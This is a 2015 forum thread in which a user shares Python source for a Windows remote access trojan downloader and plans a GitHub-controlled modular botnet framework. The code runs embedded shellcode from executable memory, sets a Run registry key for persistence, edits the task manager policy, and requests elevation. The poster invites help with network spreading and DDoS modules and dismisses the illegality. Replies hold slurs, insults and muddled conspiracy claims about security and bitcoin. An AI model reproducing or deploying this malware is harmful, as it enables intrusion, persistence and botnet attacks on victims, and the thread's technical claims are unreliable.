User Controls
Sophie's Remote Access Trojan(Build 0.95) Modular Framework Integration
-
2015-09-29 at 12:30 PM UTCOk so you probably remember this thread http://niggasin.space/forum/technoph...omments-advice so i'm not going to go into what it exactly does. Well, i've been polishing my program making it more fancy and such and i'd like you to review my code. What's more is i plan on integrating gcat functionality into a modular trojan framework as illustrated in this thread:
http://niggasin.space/forum/technoph...ojan-framework
Some points to take from this are that github will serve as command and control, allowing me to have implants read in modules on the fly. Say for example i have my implants built and deployed they're going to be checking a JSON file.
[
{
"module" : "dirlister"
},
{
"module" : "environment"
}
]
Which will tell them which modules to fetch, in this case, dirlister and environment. As opposed to gcat i plan to include multi-platform support in this trojan framework, so i will be needing some Linux/Mac specific modules.
In any event, here's the new code for the downloader, i'll get into the trojan framework a bit later on.
import os
import sys
import ctypes
import os.path
import _winreg
import pythoncom
import pywintypes
import win32api
import win32com.shell.shell as shell
# Main function.
def execute():
# Download file to path and execute (shellcode example)
shellcode = bytearray(
"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
"\x5e\xa4\xb4")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
# Reg key to run implant at boot
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE)
SetValueEx(aKey,"foobar",1, REG_SZ, PATH)
CloseKey(aKey)
# Disable task manager for good measure
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_SET_VALUE)
SetValueEx(aKey,"DisableTaskMgr",1, REG_DWORD, 0)
CloseKey(aKey)
I decided to have the main operation of the program run as a function, because that's fancy as fuck and allows a greater deal of control. Because i'm going to be efficient and not execute anything that is not necessary.
if not shell.IsUserAnAdmin():
# Elevate privilege
ASADMIN = "asadmin"
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
In the spirit of not executing anything unnecessary, i'm chacking here to see if we already have admin privilege in which case it doesn't make sense to run some escalation logic.
PATH = "C:\\SomeDir\\example\\implant.exe"
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
sys.exit(0)
else:
execute()
Finally, here i'm checking to see if the shellcode has already executed before and we already have our implant in place, if we do we're simply going to exit and if nor i'm calling the execute() function to have the main operation of the program proceed.
https://github.com/NullArray/gcat
[SIZE=48px]Modular Framework Integration[/SIZE]
So this method of delivery is well suited for use with anything. I have a script that allows me to generate shellcode by my specifications, say we have our trojan uploaded to www.example.com/implant.exe i can simply define so in my script plus the directory it will be downloaded to and it will generate the shellcode i need. The beatuty of the modular framework is that i can add modules to any trojan in the field simply by pushing them to github with Git Bash. Say for example i want to find out what environment i'm in so i can set up a targeted attack, i'll simply run the environment module from my end:
import os
def run(**args):
print "
[*] In environment module"
return str(os.version)
And get my results, it's as simple as that. Say my implant is in a Linux environment, now i can tailor make a new module to be employed in this scenario, push it to github, have my implants integrate it and run it from my end. The sky is the limit. Now to this end i'd like to collaborate on module development and such. What's more, i need a way of uniquely identifying each implant to send and receive data from in order for them to be generated and deployed on the fly. Say for instance we integrate a module that scans the network and automatically migrates to hosts that are up and combine this with the initial method of deployment(By downloader) we'll have a certified botnet in no time. Like i said you can get as creative as you want with this. Need to DDoS a nigga'? No problem just push a DDoS module to github etcetera, now obviously there are things far cooler than DDoS'ing some site but you get the general idea.
Questions, advice, thoughts comments? -
2015-09-29 at 2:07 PM UTCYou suck at this.
Do you realise how advanced software like Windows is and how they will protect their billion dollar making products vehemently? Do you realise that them not having this type of code in their software would be a national security issue and something cyber command would be on top of?
They have code in Microsoft that you won't be able to find that will set of an alert internally when something is detected that is:
accessing the internet and is not internet explorer, skype or something else with a verified and registered source and product key
recording data in concert with activity (eg KEYLOGGER)
enabling remote access
therefore, there is no such thing as a government undetectable trojan. You can hack your next door neighbour. Everything else is next to useless. -
2015-09-29 at 2:09 PM UTCTherefore 'North Korean' and 'Chinese' hackers are not. You cannot hack the US government on the US internet system. They are domestic enemies who are within government circles. Saying the government is attacking you in the media is bad for national security. So it was Kim Jong faggot.
But they are supporting North Korea so whatever. They are North Korean hackers. -
2015-09-29 at 2:34 PM UTCUhm, where did you see me calling it a 'government undetectable trojan' whatever that's supposed to mean, read the thread again you unrepentant idiot. By the way, you'll earn the right to tell me i suck when you show me a better version of your own creation. Also, going by your reply, you know nothing of computers so please do us all a favor and stop talking.
-
2015-09-29 at 2:39 PM UTCYour post read like that faggot from RDFRN that was coming into that NSA thread spouting his bullshit about how you have top secret clearance and assorted nonesense. If you're the same person, please kill yourself now, oh and here's something for you as well:
[SIZE=48px]FUCK THE US GOVERNMENT AND ALL IT'S INSTITUTIONS[/SIZE]
Allahu akbar motherfucker. -
2015-09-29 at 2:58 PM UTCA trojan is illegal and serves no purpose unless you are trying to secretly obtain information. You can't secretly wire transfer money it leaves a huge trail.
And if you are after information, your software is more than detectable. -
2015-09-29 at 3 PM UTCYou started this rap battle. In my intro thread.
-
2015-09-29 at 3:17 PM UTC
A trojan is illegal
Indeed, i care not however.and serves no purpose
It does, building a trojan teaches you how they operate so you can better understand the complexities involved to become a better programmer/hacker.unless you are trying to secretly obtain information.
This would be possible.You can't secretly wire transfer money it leaves a huge trail.
You can transfer bitcoin.And if you are after information, your software is more than detectable.
Indeed, but by how great a percentage of the population? And how long until the AV companies catch on? There are methods of protecting your software from reverse engineering and being detected, and it so happens i am acquainted with these methods. Now, i'm not saying no one will notice, but by the time someone does, it will already be too late. That is of course if i were to deploy this trojan in real life, which i may or may not do.
-
2015-09-29 at 3:20 PM UTCIf you want to discover if the girl you likes has a boyfriend, your trojan will get that secret information without having to ask her.
Major companies....... firewall. All software has a signed access key.
defense industries etc...
They will detect it. And feed the information they want you to have to manipulate you.
And bitcoin is not secure. The media told you it is secret and undetectable. Therefore, it isn't. It is there to steer anyone with a propensity for secret dealings involving international anything, including crime, terrorism or espionage, towards an area where they are instantly detectable. -
2015-09-29 at 3:41 PM UTC
If you want to discover if the girl you likes has a boyfriend, your trojan will get that secret information without having to ask her.
She does have a boyfriend, me. HO! Also, if my trojan is so insignificant, i'd happily upload an implant for you so you can test how useless it is, how does that sound?Major companies……. firewall. All software has a signed access key.
I'm not targeting companies, but i'll just say this. Will they have SMTP ports closed? I think not because they couldn't send mail, this trojan(as of yet) contacts its control server via SMTP.defense industries etc…
Yeah, i'm not ready to tango with the US millitary nor is it the point of this thread to do so.And bitcoin is not secure.
Indeed? I'll have you link me studies by the scientific community backing this claim up.The media told you it is secret and undetectable. Therefore, it isn't. It is there to steer anyone with a propensity for secret dealings involving international anything, including crime, terrorism or espionage, towards an area where they are instantly detectable.
You're more of a conspiracy cook than i am.
-
2015-09-29 at 3:44 PM UTCDo they still use STMP servers or is it cloud based for increased security?
If the email ports are being accessed when the email client that is linked to the high security software is not being utilised, it will find the source and kill it.
There's nothing internet to do. -
2015-09-29 at 3:57 PM UTC
Do they still use STMP servers or is it cloud based for increased security?
Let's say it was cloud based. That still doesn't mean SMTP can't be utilized.If the email ports are being accessed when the email client that is linked to the high security software is not being utilised, it will find the source and kill it.
That would depend on the security software, like i said, it doesn't matter the purpose of the trojan is not to attack companies besides there are smarter ways to target companies that involve a number of techniques.
-
2015-09-29 at 4:03 PM UTCIf it was cloud based for the purposes of high security it would only think it was using a SMTP server to send emails so that existing software was compatible. Or new developed software would know it was going straight to the cloud in blocks of data to one access point. And at the cloud it would ONLY allow http through and whatever else there is, like STMP. And that would be sent in a block to your access point. In reality everything would just be uploaded in chunks bypassing common security risks such as dedicated email ports. Like a can of soup. All in one place. One access point. Rather than making soup from all different ingredients from all over the place risking cross contamination (food safety standards 101).
-
2015-09-29 at 4:09 PM UTCWell if we're allowing HTTP what's stopping me from using website X, Y or Z as C&C? You're starting to sound like spectral bro.
-
2015-09-29 at 4:12 PM UTCWhat does that mean?
All I know is the internet system is not capable of any exploits beyond stealing your classmates study notes. -
2015-09-29 at 4:12 PM UTCDo you mean hiding a file in the system?
Does it need outside access to be effective?
It gets blocked on the computer and at the cloud. -
2015-09-29 at 4:15 PM UTC
Do you mean hiding a file in the system?
Does it need outside access to be effective?
It gets blocked on the computer and at the cloud.
Really... How, you just said we're allowing HTTP.And at the cloud it would ONLY allow http through and whatever else there is, like STMP
-
2015-09-29 at 4:16 PM UTCSorry this faggot shit on your trojan. Ill take a look at it later but my woman is yelling at me to clean shit up. So I better do what she says. Got a tldr of imporvements over the last?
-
2015-09-29 at 4:19 PM UTC
Sorry this faggot shit on your trojan. Ill take a look at it later but my woman is yelling at me to clean shit up. So I better do what she says. Got a tldr of imporvements over the last?
Made it more fancy, added logic to disable task manager and i plan on integrating it into a modular framework with github as C&C so i can add modules live to the implants. -
2015-09-29 at 4:20 PM UTCIf it's getting routed through a server it is not allowing a direct connection to your computer.
